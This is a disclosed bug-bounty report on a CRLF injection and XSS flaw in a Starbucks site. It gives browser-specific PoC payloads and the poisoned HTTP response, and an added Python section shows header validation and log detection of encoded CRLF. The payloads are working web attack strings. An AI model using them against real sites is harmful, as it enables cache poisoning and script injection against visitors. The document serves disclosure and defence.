Starbucks: [] CRLF Injection, XSS

ID H1:192749
Type hackerone
Reporter bobrov
Modified 2017-03-09T03:31:53


PoC (Firefox): `<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e`

After the request is sent through Firefox, the response is saved in the cache, and with a small trick it can be made to work in another browser as well.

PoC (Chrome): Make sure you send this request after the Firefox one, and that the previous HTTP response contained the header `X-Cache: HIT`.

`<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e`

HTTP Response

```http
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <
Content-Length:35
X-XSS-Protection:0

23
<svg onload=alert(document.domain)>
0
```
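The response above shows the root cause: a percent-encoded request path is decoded and reflected into the `Link` header, so `%0d%0a` becomes a real CRLF and the attacker-controlled text is parsed as further headers and a body. The following is an added example (not code from the report, the reporter, or Starbucks) of the two things a defender wants here: a header-value guard that refuses control characters before anything request-derived is reflected, and a log check that flags request targets carrying encoded CR/LF. All function names are hypothetical and the log lines are constructed.

```python
"""Added example: reject CR/LF in reflected header values and flag
encoded CR/LF in request logs. Not the vendor's code; names are
hypothetical and the sample log lines below are constructed."""
import re
from urllib.parse import unquote

# RFC 7230 field-value characters: HTAB, visible ASCII (0x20-0x7E) and
# obs-text (0x80-0xFF). CR, LF, NUL and other controls must never reach
# the wire inside a header value, because the client parses them as a
# header boundary (exactly what the Link header above suffered).
_FIELD_VALUE_OK = re.compile(r'[\t\x20-\x7e\x80-\xff]*')


class HeaderInjectionError(ValueError):
    """Raised when a would-be header value contains a control character."""


def is_safe_header_value(value: str) -> bool:
    """True if value can be emitted as a single header line unchanged."""
    # fullmatch, not match/$: '$' would accept a trailing '\n'.
    return _FIELD_VALUE_OK.fullmatch(value) is not None


def safe_header_value(value: str) -> str:
    """Return value if it is a legal single-line header value, else raise.
    Call this on every request-derived string before putting it into a
    response header such as Link or Location."""
    if not is_safe_header_value(value):
        raise HeaderInjectionError(f"control character in header value: {value!r}")
    return value


def link_header_for(request_path: str) -> str:
    """Build a Link header from a percent-encoded request path.

    Decoding happens first: that is the step where %0d%0a turns into a
    literal CRLF, so validation has to run on the decoded string."""
    decoded = unquote(request_path)
    return f'Link: <{safe_header_value(decoded)}>; rel="canonical"'


# --- Detection side -------------------------------------------------------
# Encoded CR (%0d) or LF (%0a) in a request target is almost never legitimate
# on a static-asset path and is the signature of the probe shown in the report.
_ENCODED_CRLF = re.compile(r'%0[dDaA]')
_REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/')


def flag_crlf_requests(log_lines):
    """Return the request targets from Combined-Log-Format lines whose
    path or query contains an encoded CR or LF."""
    hits = []
    for line in log_lines:
        m = _REQUEST_LINE.search(line)
        if m and _ENCODED_CRLF.search(m.group(1)):
            hits.append(m.group(1))
    return hits


# Constructed sample log lines (not real traffic); the second mirrors the
# shape of the report's PoC with the reflected segment replaced by a path.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Dec/2016:14:34:03 +0000] "GET /assets/app.css HTTP/1.1" 200 22907',
    '203.0.113.7 - - [20/Dec/2016:14:34:05 +0000] "GET /assets/%0d%0a0%0d%0a/%2e%2e HTTP/1.1" 200 35',
    '198.51.100.2 - - [20/Dec/2016:14:35:00 +0000] "GET /index.html?q=%0A HTTP/1.1" 200 10',
]


if __name__ == "__main__":
    print(link_header_for("/css/app.css"))
    try:
        link_header_for("/x%0d%0aX-XSS-Protection:0")
    except HeaderInjectionError as exc:
        print("rejected:", exc)
    print("suspicious request targets:", flag_crlf_requests(SAMPLE_LOG))
```

The guard is an allow-list on the decoded value rather than a blocklist of `%0d%0a`, so double-encoding or a bare `%0a` cannot slip past it; the log check is deliberately the looser of the two, since a SOC would rather review a handful of false positives than miss a cache-poisoning probe that later serves to every visitor as `X-Cache: HIT`.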